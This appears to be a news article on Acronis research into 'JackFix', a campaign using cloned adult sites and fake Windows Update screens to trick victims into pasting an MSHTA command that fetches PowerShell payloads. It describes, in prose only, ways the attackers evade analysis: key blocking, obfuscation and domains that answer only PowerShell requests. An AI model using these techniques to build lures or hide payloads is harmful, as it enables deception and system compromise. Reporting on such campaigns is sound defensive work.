A new cyberattack campaign is gaining attention for its sophisticated use of fake adult websites and ClickFix-style deception to compromise user systems. The campaign employs clones of popular adult sites like xHamster and PornHub as its phishing delivery mechanism, often distributed through malvertising. According to a report by Acronis, the controversial nature of the adult theme and the possible connection to “shady websites” intensify the psychological pressure on victims, making them more likely to comply swiftly with the sudden appearance of a supposed “critical security update” installation. This tactic capitalizes on the overall surge in ClickFix attacks over the past year, where users are prompted to execute malicious commands on their own machines under the pretense of technical fixes or security checks; Microsoft data shows ClickFix is now the most common initial access method, accounting for 47% of all attacks.
The latest iteration of this attack, which the Singapore-based cybersecurity firm Acronis has codenamed JackFix, distinguishes itself by employing highly convincing fake Windows update screens instead of more traditional robot-check lures. Perhaps the most alarming aspect of this attack is how the phony Windows update alert is designed to hijack the victim’s experience. The full-screen alert provides explicit instructions: the victim is told to open the Windows Run dialog box, press the Ctrl + V key combination, and then hit Enter, thereby triggering the immediate infection sequence by manually pasting and executing malicious code. This shift from robot-checks to a near-total screen takeover and manual command execution indicates an evolution in how attackers are seeking to bypass technical defenses and leverage user compliance.
It is assessed that the starting point for victims is redirection, likely via malvertising or various social engineering schemes, to one of these fake adult sites. Upon interacting with any element on the phishing site, the victim is suddenly served the “urgent security update” notification. Security researcher Eliad Kimhy explained that the fake Windows Update screen is constructed entirely using HTML and JavaScript code, immediately attempting to go full screen and displaying a remarkably convincing window with a blue background and white text, deliberately reminiscent of Windows’ infamous Blue Screen of Death. Some versions of these malicious sites have been found to contain developer comments written in Russian, which suggests the possibility of a Russian-speaking threat actor being behind the campaign.
The attack heavily relies on layers of obfuscation to conceal the underlying ClickFix-related code from security analysis. Furthermore, the malware attempts to block victims from escaping the full-screen alert by disabling common escape mechanisms, specifically the Escape and F11 buttons, as well as the F5 and F12 keys, which are often used by security professionals for page inspection and reloading. Despite this attempt at lockdown, the researchers discovered a flaw in the logic of the code that still allows users to use the Escape and F11 keys to dismiss the full-screen view. The initial command that the victim is tricked into running is an MSHTA payload.
This MSHTA payload is executed using the legitimate $mshta.exe$ binary and contains JavaScript designed to execute a PowerShell command. This first PowerShell command is merely a fetch mechanism, designed to retrieve a secondary, more potent PowerShell script from a remote server. To further prevent simple analysis, the command and control domains used in the attack are set up to redirect any user who navigates to them directly—such as a security analyst—to a benign, non-malicious site like Google or Steam. Acronis noted that the malicious site only responds with the correct infection code when it is specifically accessed via an $irm$ or $iwr$ PowerShell command, thereby creating a crucial extra layer of obfuscation and analysis prevention for the threat actors.
Reference:
